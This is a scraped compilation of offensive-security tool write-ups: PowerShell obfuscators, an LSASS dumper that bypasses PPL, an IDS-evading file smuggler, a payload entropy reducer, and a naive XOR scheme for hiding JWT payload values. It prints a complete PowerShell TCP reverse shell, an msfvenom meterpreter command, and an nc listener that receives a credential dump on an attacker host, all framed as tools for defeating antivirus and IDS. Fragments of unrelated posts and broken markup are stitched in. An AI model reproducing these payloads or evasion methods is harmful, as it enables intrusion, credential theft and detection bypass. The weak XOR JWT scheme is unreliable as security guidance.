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Psobf - PowerShell Obfuscator

By: Zion3R

Tool for obfuscating PowerShell scripts written in Go. The main objective of this program is to obfuscate PowerShell code to make its analysis and detection more difficult. The script offers 5 levels of obfuscation, from basic obfuscation to script fragmentation. This allows users to tailor the obfuscation level to their specific needs.

./psobf -h

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
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Usage: ./obfuscator -i <inputFile> -o <outputFile> -level <1|2|3|4|5>
-i string
Name of the PowerShell script file.
-level int
Obfuscation level (1 to 5). (default 1)
-o string
Name of the output file for the obfuscated script. (default "obfuscated.ps1")

Obfuscation levels:
1: Basic obfuscation by splitting the script into individual characters.
2: Base64 encoding of the script.
3: Alternative Base64 encoding with a different PowerShell decoding method.
4: Compression and Base64 encoding of the script will be decoded and decompressed at runtime.
5: Fragmentation of the script into multiple parts and reconstruction at runtime.


  • Obfuscation Levels: Four levels of obfuscation, each more complex than the previous one.
    • Level 1 obfuscation by splitting the script into individual characters.
    • Level 2 Base64 encoding of the script.
    • Level 3 Alternative Base64 encoding with a different PowerShell decoding method.
    • Level 4 Compression and Base64 encoding of the script will be decoded and decompressed at runtime.
    • Level 5 Fragmentation of the script into multiple parts and reconstruction at runtime.
  • Compression and Encoding: Level 4 includes script compression before encoding it in base64.
  • Variable Obfuscation: A function was added to obfuscate the names of variables in the PowerShell script.
  • Random String Generation: Random strings are generated for variable name obfuscation.


go install

Example of Obfuscation Levels

The obfuscation levels are divided into 5 options. First, you need to have a PowerShell file that you want to obfuscate. Let's assume you have a file named script.ps1 with the following content:

Write-Host "Hello, World!"

Level 1: Basic Obfuscation

Run the script with level 1 obfuscation.

./obfuscator -i script.ps1 -o obfuscated_level1.ps1 -level 1

This will generate a file named obfuscated_level1.ps1 with the obfuscated content. The result will be a version of your script where each character is separated by commas and combined at runtime.
Result (level 1)

$obfuscated = $([char[]]("`W`,`r`,`i`,`t`,`e`,`-`,`H`,`o`,`s`,`t`,` `,`"`,`H`,`e`,`l`,`l`,`o`,`,` `,`W`,`o`,`r`,`l`,`d`,`!`,`"`") -join ''); Invoke-Expression $obfuscated

Level 2: Base64 Encoding

Run the script with level 2 obfuscation:

./obfuscator -i script.ps1 -o obfuscated_level2.ps1 -level 2

This will generate a file named obfuscated_level2.ps1 with the content encoded in base64. When executing this script, it will be decoded and run at runtime.
Result (level 2)

$obfuscated = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8sIFdvcmxkISI=')); Invoke-Expression $obfuscated

Level 3: Alternative Base64 Encoding

Execute the script with level 3 obfuscation:

./obfuscator -i script.ps1 -o obfuscated_level3.ps1 -level 3

This level uses a slightly different form of base64 encoding and decoding in PowerShell, adding an additional layer of obfuscation.
Result (level 3)

$e = [System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8sIFdvcmxkISI='); $obfuscated = [System.Text.Encoding]::UTF8.GetString($e); Invoke-Expression $obfuscated

Level 4: Compression and Base64 Encoding

Execute the script with level 4 obfuscation:

./obfuscator -i script.ps1 -o obfuscated_level4.ps1 -level 4

This level compresses the script before encoding it in base64, making analysis more complicated. The result will be decoded and decompressed at runtime.
Result (level 4)

$compressed = 'H4sIAAAAAAAAC+NIzcnJVyjPL8pJUQQAlRmFGwwAAAA='; $bytes = [System.Convert]::FromBase64String($compressed); $stream = New-Object IO.MemoryStream(, $bytes); $decompressed = New-Object IO.Compression.GzipStream($stream, [IO.Compression.CompressionMode]::Decompress); $reader = New-Object IO.StreamReader($decompressed); $obfuscated = $reader.ReadToEnd(); Invoke-Expression $obfuscated

Level 5: Script Fragmentation

Run the script with level 5 obfuscation:

./obfuscator -i script.ps1 -o obfuscated_level5.ps1 -level 5

This level fragments the script into multiple parts and reconstructs it at runtime.
Result (level 5)

$fragments = @(
'Output "',
' Wo',
$script = $fragments -join '';
Invoke-Expression $script

This program is provided for educational and research purposes. It should not be used for malicious activities.

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Some-Tweak-To-Hide-Jwt-Payload-Values - A Handful Of Tweaks And Ideas To Safeguard The JWT Payload

By: Zion3R

  • a handful of tweaks and ideas to safeguard the JWT payload, making it futile to attempt decoding by constantly altering its value,
    ensuring the decoded output remains unintelligible while imposing minimal performance overhead.

What is a JWT Token?

A JSON Web Token (JWT, pronounced "jot") is a compact and URL-safe way of passing a JSON message between two parties. It's a standard, defined in RFC 7519. The token is a long string, divided into parts separated by dots. Each part is base64 URL-encoded.

What parts the token has depends on the type of the JWT: whether it's a JWS (a signed token) or a JWE (an encrypted token). If the token is signed it will have three sections: the header, the payload, and the signature. If the token is encrypted it will consist of five parts: the header, the encrypted key, the initialization vector, the ciphertext (payload), and the authentication tag. Probably the most common use case for JWTs is to utilize them as access tokens and ID tokens in OAuth and OpenID Connect flows, but they can serve different purposes as well.

Primary Objective of this Code Snippet

This code snippet offers a tweak perspective aiming to enhance the security of the payload section when decoding JWT tokens, where the stored keys are visible in plaintext. This code snippet provides a tweak perspective aiming to enhance the security of the payload section when decoding JWT tokens. Typically, the payload section appears in plaintext when decoded from the JWT token (base64). The main objective is to lightly encrypt or obfuscate the payload values, making it difficult to discern their meaning. The intention is to ensure that even if someone attempts to decode the payload values, they cannot do so easily.

  • The code snippet targets the key named "userid" stored in the payload section as an example.
  • The choice of "userid" stems from its frequent use for user identification or authentication purposes after validating the token's validity (e.g., ensuring it has not expired).

The idea behind attempting to obscure the value of the key named "userid" is as follows:

  • The timestamp is hashed and then encrypted by performing bitwise XOR operation with the user ID.
  • XOR operation is performed using a symmetric key.
  • The resulting value is then encoded using Base64.

  • Encrypted data is decoded using Base64.
  • Decryption is performed by XOR operation with the symmetric key.
  • The original user ID and hashed timestamp are revealed in plaintext.
  • The user ID part is extracted by splitting at the "|" delimiter for relevant use and purposes.

Symmetric Key for XOR Encoding:
  • Various materials can be utilized for this key.
  • It could be a salt used in conventional password hashing, an arbitrary random string, a generated UUID, or any other suitable material.
  • However, this key should be securely stored in the database management system (DBMS).


in the example, the key is shown as { 'userid': 'random_value' },
making it apparent that it represents a user ID.

However, this is merely for illustrative purposes.

In practice, a predetermined and undisclosed name is typically used.
For example, 'a': 'changing_random_value'

  • This code snippet is created for educational purposes and serves as a starting point for ideas rather than being inherently secure.
  • It provides a level of security beyond plaintext visibility but does not guarantee absolute safety.

Attempting to tamper with JWT tokens generated using this method requires access to both the JWT secret key and the XOR symmetric key used to create the UserID.

  • If you find this helpful, please the "star":star2: to support further improvements.

# python3

- Current Unix Timestamp: 1709160368
- Current Unix Timestamp to Human Readable: 2024-02-29 07:46:08

- userid: 23243232
- XOR Symmetric key: b'generally_user_salt_or_hash_or_random_uuid_this_value_must_be_in_dbms'
- JWT Secret key: yes_your_service_jwt_secret_key

- Encoded UserID and Timestamp: VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo=
- Decoded UserID and Hashed Timestamp: 23243232|e27436b7393eb6c2fb4d5e2a508a9c5c

- Decoded JWT: {'timestamp': '2024-02-29 07:46:08', 'userid': 'VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo='}

# run again
- Decoded JWT: {'timestamp': '2024-02-29 08:16:36', 'userid': 'VVZcUUFTX14FaRNAVBRpRQcORmtWRGl eVUtRZlYXaBZZCgYOWGlDR10='}
- Decoded JWT: {'timestamp': '2024-02-29 08:16:51', 'userid': 'VVZcUUFTX14FZxMRVUdnEgJZEmxfRztRVUBabAsRZkdVVlJWWztGQVA='}
- Decoded JWT: {'timestamp': '2024-02-29 08:17:01', 'userid': 'VVZcUUFTX14FbxYQUkM8RVRZEmkLRWsNUBYNb1sQPREFDFYKDmYRQV4='}
- Decoded JWT: {'timestamp': '2024-02-29 08:17:09', 'userid': 'VVZcUUFTX14FbUNEVEVqEFlaTGoKQjxZBRULOlpGPUtSClALWD5GRAs='}

PikaBot Resurfaces with Streamlined Code and Deceptive Tactics

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PPLBlade - Protected Process Dumper Tool

By: Zion3R

Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.

Key functionalities:

  1. Bypassing PPL protection
  2. Obfuscating memory dump files to evade Defender signature-based detection mechanisms
  3. Uploading memory dump with RAW and SMB upload methods without dropping it onto the disk (fileless dump)

Overview of the techniques, used in this tool can be found here:

Note that PROCEXP15.SYS is listed in the source files for compiling purposes. It does not need to be transferred on the target machine alongside the PPLBlade.exe.

It’s already embedded into the PPLBlade.exe. The exploit is just a single executable.


  1. Dump - Dump process memory using PID or Process Name
  2. Decrypt - Revert obfuscated(--obfuscate) dump file to its original state
  3. Cleanup - Do cleanup manually, in case something goes wrong on execution (Note that the option values should be the same as for the execution, we're trying to clean up)
  4. DoThatLsassThing - Dump lsass.exe using Process Explorer driver (basic poc)

Handle Modes:

  1. Direct - Opens PROCESS_ALL_ACCESS handle directly, using OpenProcess() function
  2. Procexp - Uses PROCEXP152.sys to obtain a handle

Basic POC that uses PROCEXP152.sys to dump lsass:

PPLBlade.exe --mode dothatlsassthing

(Note that it does not XOR dump file, provide an additional obfuscate flag to enable the XOR functionality)

Upload the obfuscated LSASS dump onto a remote location:

PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip --port 1234

Attacker host:

nc -lnp 1234 > lsass.dmp
python3 --dumpname lsass.dmp

Deobfuscate memory dump:

PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade

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Skyhook - A Round-Trip Obfuscated HTTP File Transfer Setup Built To Bypass IDS Detections

By: Zion3R

Skyhook is a REST-driven utility used to smuggle files into and out of networks defended by IDS implementations. It comes with a pre-packaged web client that uses a blend of React, vanilla JS, and web assembly to manage file transfers.

Key Links


  • Round trip file content obfuscation
  • User-configurable obfuscation chaining
  • Self-signed and Lets Encrypt certificate procurement methods
  • Embedded web applications for both configuration and file transfers.
  • Server fingerprinting resiliency techniques:
    • Encrypted loaders capable of dynamically encrypting interface files as the file transfer interface is rendered
    • API and web resource path randomization

Brief Description

Note: See the user documentation for more thorough discussion of Skyhook and how it functions.

Skyhook's file transfer server seamlessly obfuscates file content with a user-configured series of obfuscation algorithms prior to writing the content to response bodies. Clients, which are configred with the same obfuscation algorithms, deobfuscate the file content prior to saving the file to disk. A file streaming technique is used to manage the HTTP transactions in a chunked manner, thus facilitating large file transfers.


subgraph sg-cloudfront[Cloudfront CDN]

subgraph sg-vps[VPS]
subgraph sg-skyhook[Skyhook Servers]
admin-listener(Admin Server<br>45000/tls)
transfer-listener(Transfer Server<br>45001/tls)

config-file(Config File<br>/var/skyroot/config.yml)

admin-listener -..->|Reads &<br>Manages| config-file

transfer-listener -..->|Serves From &<br>Writes Cleartext<br>Files To| webroot

op-browser(Operator<br>Web Browser) -->|Administration<br>Traffic| admin-listener
op-browser <-->|Obfuscated<br>Data| transfer-listener

subgraph sg-corp[Corporate Environment]
subgraph sg-compromised[Beachhead Host]
comp-browser(Web Browser) -->|Reads &<b r>Writes| cleartext-file(Cleartext Files)

comp-browser <-->|Obfuscated<br>Data| cf-listener <-->|Obfuscated<br>Data| transfer-listener

A Brief Example

For example, here is a working obfuscation configuration:

And here is the file transfer interface. Clicking "Download" results in the file being retrieved in chunks that are encrypted with the chain of obfuscation methods configured above.

JavaScript deobfuscates the file before prompting the user to save it to disk.

Below is a request stemming from a download being inspected with Burp. Key elements of the transaction are encrypted to evade detection.

EntropyReducer - Reduce Entropy And Obfuscate Youre Payload With Serialized Linked Lists

By: Zion3R

EntropyReducer: Reduce The Entropy Of Youre Payload And Obfuscate It With Serialized Linked Lists

How Does It Work

EntropyReducer algorithm is determined by BUFF_SIZE and NULL_BYTES values. The following is how would EntropyReducer organize your payload if BUFF_SIZE was set to 4, and NULL_BYTES to 2.

Obfuscation Algorithm

  • EntropyReducer first checks if the input raw payload is of a size that's multiple of BUFF_SIZE, if not, it pads it to be as so.
  • It then takes every BUFF_SIZE chunk from the payload, and makes a linked list node for it, using the InitializePayloadList function, initializing the payload as a linked list.
  • The created node will have an empty buffer of size NULL_BYTES, that will be used to lower the entropy
  • At this point, although EntropyReducer completed its task by lowering the entropy of the payload, it doesn't stop here. It then continues to randomize the order of each node in the linked list, breaking down the raw payload's order. This step is done via a Merge Sort Algorithm that is implemented through the MergeSort function.
  • The sorted linked list is in random order because the value in which the linked list is sorted is the XOR value of the first three bytes of the raw payload, this value determines its position in the re-organized linked list, this step can be shown here
  • Since saving a linked list to a file is impossible due to the fact that it's linked together by pointers. We are forced to serialize it.
  • Serialization of the generated linked list is done via the Obfuscate function here.
  • After that, the serialized data is ready to be written to the output file.

Deobfuscation Algorithm

  • Since the last step in the Obfuscation Algorithm was serializing the linked list, the first thing that must be done here is to deserialize the obfuscated payload, generating a linked list from it, this step is done here in the Deobfuscate function.
  • Next step is to sort the linked list using the node's Id, which is done using the same Merge Sort Algorithm used before.
  • Now, the linked list is in the right order to re-construct the payload's bytes as they should. So we simply strip the payload's original bytes from each node, as done here.
  • Last step is to free the allocated nodes, which is done here.


  • EntropyReducer simply read the raw payload file from the command line, and writes the obfuscated version to the same file's name prefixed with ".ER".
  • The size of the final obfuscated payload varies depending on the values of both BUFF_SIZE and NULL_BYTES. However, it can be determined using the following equation
FinalSize = ((OriginalSize + BUFF_SIZE - OriginalSize % BUFF_SIZE ) / BUFF_SIZE) * (BUFF_SIZE + NULL_BYTES + sizeof(INT))
  • The PoC project in this repo is used to execute the ".ER" file generated as an example of deserializing and deobfuscating it.

Include In Your Projects

All you have to do is add EntropyReducer.c and EntropyReducer.h files to your project, and call the Deobfuscate function. You can check PoC/main.c for reference.

Output Example

In this example, BUFF_SIZE was set to 3, and NULL_BYTES to 1.

  • The raw payload, first payload chunk (FC 48 83)

  • The same payload chunk, but at a different offset


  • The same file, AES encrypted, scores entropy of 7.110.

  • Nearly the same result with the RC4 algorithm as well; 7.210

  • Using EntropyReducer however, scoring entropy even lower that that of the original raw payload; 4.093

The Merge Sort Algorithm Is Taken From c-linked-list.

Invoke-PSObfuscation - An In-Depth Approach To Obfuscating The Individual Components Of A PowerShell Payload Whether You'Re On Windows Or Kali Linux

Traditional obfuscation techniques tend to add layers to encapsulate standing code, such as base64 or compression. These payloads do continue to have a varied degree of success, but they have become trivial to extract the intended payload and some launchers get detected often, which essentially introduces chokepoints.

The approach this tool introduces is a methodology where you can target and obfuscate the individual components of a script with randomized variations while achieving the same intended logic, without encapsulating the entire payload within a single layer. Due to the complexity of the obfuscation logic, the resulting payloads will be very difficult to signature and will slip past heuristic engines that are not programmed to emulate the inherited logic.

While this script can obfuscate most payloads successfully on it's own, this project will also serve as a standing framework that I will to use to produce future functions that will utilize this framework to provide dedicated obfuscated payloads, such as one that only produces reverse shells.

I wrote a blog piece for Offensive Security as a precursor into the techniques this tool introduces. Before venturing further, consider giving it a read first:

Dedicated Payloads

As part of my on going work with PowerShell obfuscation, I am building out scripts that produce dedicated payloads that utilize this framework. These have helped to save me time and hope you find them useful as well. You can find them within their own folders at the root of this repository.

  1. Get-ReverseShell
  2. Get-DownloadCradle
  3. Get-Shellcode


Like many other programming languages, PowerShell can be broken down into many different components that make up the executable logic. This allows us to defeat signature-based detections with relative ease by changing how we represent individual components within a payload to a form an obscure or unintelligible derivative.

Keep in mind that targeting every component in complex payloads is very instrusive. This tool is built so that you can target the components you want to obfuscate in a controlled manner. I have found that a lot of signatures can be defeated simply by targeting cmdlets, variables and any comments. When using this against complex payloads, such as print nightmare, keep in mind that custom function parameters / variables will also be changed. Always be sure to properly test any resulting payloads and ensure you are aware of any modified named paramters.

Component types such as pipes and pipeline variables are introduced here to help make your payload more obscure and harder to decode.

Supported Types

  • Aliases (iex)
  • Cmdlets (New-Object)
  • Comments (# and <# #>)
  • Integers (4444)
  • Methods ($client.GetStream())
  • Namespace Classes (System.Net.Sockets.TCPClient)
  • Pipes (|)
  • Pipeline Variables ($_)
  • Strings ("value" | 'value')
  • Variables ($client)


Each component has its own dedicated generator that contains a list of possible static or dynamically generated values that are randomly selected during each execution. If there are multiple instances of a component, then it will iterative each of them individually with a generator. This adds a degree of randomness each time you run this tool against a given payload so each iteration will be different. The only exception to this is variable names.

If an algorithm related to a specific component starts to cause a payload to flag, the current design allows us to easily modify the logic for that generator without compromising the entire script.

$Picker = 1..6 | Get-Random
Switch ($Picker) {
1 { $NewValue = 'Stay' }
2 { $NewValue = 'Off' }
3 { $NewValue = 'Ronins' }
4 { $NewValue = 'Lawn' }
5 { $NewValue = 'And' }
6 { $NewValue = 'Rocks' }


This framework and resulting payloads have been tested on the following operating system and PowerShell versions. The resulting reverse shells will not work on PowerShell v2.0

PS Version OS Tested Invoke-PSObfucation.ps1 Reverse Shell
7.1.3 Kali 2021.2 Supported Supported
5.1.19041.1023 Windows 10 10.0.19042 Supported Supported
5.1.21996.1 Windows 11 10.0.21996 Supported Supported

Usage Examples

CVE-2021-34527 (PrintNightmare)

└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.
Type 'help' to get help.

PS /home/tristram> . ./Invoke-PSObfuscation.ps1
PS /home/tristram> Invoke-PSObfuscation -Path .\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printnightmare.ps1

>> Layer 0 Obfuscation

[*] Obfuscating namespace classes
[*] Obfuscating cmdlets
[*] Obfuscating variables
[-] -DriverName is now -QhYm48JbCsqF
[-] -NewUser is now -ybrcKe
[-] -NewPassword is now -ZCA9QHerOCrEX84gMgNwnAth
[-] -DLL is now -dNr
[-] -ModuleName is now -jd
[-] -Module is now -tu3EI0q1XsGrniAUzx9WkV2o
[-] -Type is now -fjTOTLDCGufqEu
[-] -FullName is now -0vEKnCqm
[-] -EnumElements is now -B9aFqfvDbjtOXPxrR< br/>[-] -Bitfield is now -bFUCG7LB9gq50p4e
[-] -StructFields is now -xKryDRQnLdjTC8
[-] -PackingSize is now -0CB3X
[-] -ExplicitLayout is now -YegeaeLpPnB
[*] Removing comments
[*] Writing payload to o-printnightmare.ps1
[*] Done

PS /home/tristram>

PowerShell Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient("",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Generator 2 >> 4444 >> $(0-0+0+0-0-0+0+4444) Generator 1 >> 65535 >> $((65535)) [*] Obfuscating strings Generator 2 >> >> $([char](16*49/16)+[char](109*50/109)+[char](0+55-0)+[char](20*46/20)+[char](0+48-0)+[char](0+46-0)+[char](0+48-0)+[char](0+46-0)+[char](51*49/51)) Generator 2 >> PS >> $([char](1*80/1)+[char](86+83-86)+[char](0+32-0)) Generator 1 >> > >> ([string]::join('', ( (62,32) |%{ ( [char][int] $_)})) | % {$_}) [*] Obfuscating cmdlets Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Generator 1 >> Out-String >> & (("Tpltq1LeZGDhcO4MunzVC5NIP-vfWow6RxXSkbjYAU0aJm3KEgH2sFQr7i8dy9B")[13,16,3,25,35,3,55,57,17,49] -join '') [*] Writing payload to /home/tristram/obfuscated.ps1 [*] Done" dir="auto">
└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.
Type 'help' to get help.

PS /home/tristram> . ./Invoke-PSObfuscation.ps1
PS /home/tristram> Invoke-PSObfuscation -Path ./revshell.ps1 -Integers -Cmdlets -Strings -ShowChanges

>> Layer 0 Obfuscation

[*] Obfuscating integers
Generator 2 >> 4444 >> $(0-0+0+0-0-0+0+4444)
Generator 1 >> 65535 >> $((65535))
[*] Obfuscating strings
Generator 2 >> >> $([char](16*49/16)+[char](109*50/109)+[char](0+55-0)+[char](20*46/20)+[char](0+48-0)+[char](0+46-0)+[char](0+48-0)+[char](0+46-0)+[char](51*49/51))
Generator 2 >> PS >> $([char](1 *80/1)+[char](86+83-86)+[char](0+32-0))
Generator 1 >> > >> ([string]::join('', ( (62,32) |%{ ( [char][int] $_)})) | % {$_})
[*] Obfuscating cmdlets
Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_})
Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_})
Generator 1 >> Out-String >> & (("Tpltq1LeZGDhcO4MunzVC5NIP-vfWow6RxXSkbjYAU0aJm3KEgH2sFQr7i8dy9B")[13,16,3,25,35,3,55,57,17,49] -join '')
[*] Writing payload to /home/tristram/obfuscated.ps1
[*] Done

Obfuscated PowerShell Reverse Shell

Meterpreter PowerShell Shellcode

└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.
Type 'help' to get help.

PS /home/kali> msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 EXITFUNC=thread -f ps1 -o meterpreter.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 686 bytes
Final size of ps1 file: 3385 bytes
Saved as: meterpreter.ps1
PS /home/kali> . ./Invoke-PSObfuscation.ps1
PS /home/kali> Invoke-PSObfuscation -Path ./meterpreter.ps1 -Integers -Variables -OutFile o-meterpreter.ps1

>> Layer 0 Obfuscation

[*] Obfuscating integers
[*] Obfuscating variables
[*] Writing payload to o-meterpreter.ps1
[*] Done

Comment-Based Help

Transforms PowerShell scripts into something obscure, unclear, or unintelligible.

Where most obfuscation tools tend to add layers to encapsulate standing code, such as base64 or compression,
they tend to leave the intended payload intact, which essentially introduces chokepoints. Invoke-PSObfuscation
focuses on replacing the existing components of your code, or layer 0, with alternative values.

A user provided PowerShell payload via a flat file.

The all switch is used to engage every supported component to obfuscate a given payload. This action is very intrusive
and could result in your payload being broken. There should be no issues when using this with the vanilla reverse
shell. However, it's recommended to target specific components with more advanced payloads. Keep in mind that some of
the generators introduced in this script may even confuse your ISE so be sure to test properly.

The aliases switch is used to instruct the function to obfuscate aliases.

The cmdlets switch is used to instruct the function to obfuscate cmdlets.

The comments switch is used to instruct the function to remove all comments.

The integers switch is used to instruct the function to obfuscate integers.

The methods switch is used to instruct the function to obfuscate method invocations.

.PARAMETER NamespaceClasses
The namespaceclasses switch is used to instruct the function to obfuscate namespace classes.

The pipes switch is used to in struct the function to obfuscate pipes.

.PARAMETER PipelineVariables
The pipeline variables switch is used to instruct the function to obfuscate pipeline variables.

.PARAMETER ShowChanges
The ShowChanges switch is used to instruct the script to display the raw and obfuscated values on the screen.

The strings switch is used to instruct the function to obfuscate prompt strings.

.PARAMETER Variables
The variables switch is used to instruct the function to obfuscate variables.

PS C:\> Invoke-PSObfuscation -Path .\revshell.ps1 -All

PS C:\> Invoke-PSObfuscation -Path .\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printernightmare.ps1

System.String, System.String

Additional information abo ut the function.
